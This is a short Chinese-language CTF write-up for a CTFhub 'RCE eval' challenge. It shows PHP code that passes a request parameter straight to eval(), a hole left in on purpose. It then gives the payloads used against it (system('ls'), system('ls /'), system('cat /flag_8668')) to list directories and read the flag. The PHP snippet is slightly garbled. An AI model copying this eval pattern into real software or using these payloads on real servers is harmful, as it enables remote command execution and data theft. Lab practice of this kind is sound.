CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST'cmd')) {

eval($_REQUEST"cmd");

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
码不停蹄的玄黓几秒前
AQS底层原理
java
糖果店的幽灵3 分钟前
Claude Code 完全实战指南 - 第四章:Skill 怎么写
java·服务器·前端
jeffer_liu9 分钟前
Spring AI 生产级实战:记忆管理
java·人工智能·后端·spring·语言模型
light blue bird11 分钟前
MES/ERP 工序 BOM 协同场景调度维护组件
前端·信息可视化·桌面端winform·多节点端·gdi图表绘制开发
憧憬成为java架构高手的小白20 分钟前
git工作流程简化版
java·spring boot·git
触底反弹23 分钟前
苹果换芯片,用户说「真香」;微软换芯片,用户说「退货」—— 同样的事,为什么结果完全相反?
java·架构·编程语言
鱼人23 分钟前
Vue 3 组合式 API 最佳实践:如何写出可维护的代码
前端
wuhen_n23 分钟前
LangChain 自定义 Tool 封装:打造专属 AI 能力工具集
前端·langchain·ai编程
长大198823 分钟前
彻底搞懂 JavaScript 事件循环
前端
橘猫走江湖25 分钟前
Web 前端本地存储:localStorage 与 IndexedDB
前端·javascript·indexeddb